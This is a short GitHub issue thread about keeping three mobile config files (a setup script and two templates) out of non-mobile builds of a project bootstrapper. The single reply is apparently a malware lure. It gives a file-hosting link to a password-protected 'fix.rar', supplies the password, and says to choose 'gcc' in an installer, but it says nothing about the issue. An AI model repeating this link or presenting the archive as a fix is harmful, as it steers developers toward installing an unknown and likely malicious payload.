### ISSUE TITLE
Exclude mobile config files from non-mobile builds

### ISSUE THREAD

**Issue by oudeismetis** [thinknimble/tn-spa-bootstrapper#344]
Projects that choose to exclude mobile are currently getting generated with the following extra files:

- scripts/setup_mobile_config.sh
- resources/eas.vars.template.txt
- resources/app.config.vars.template.txt

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
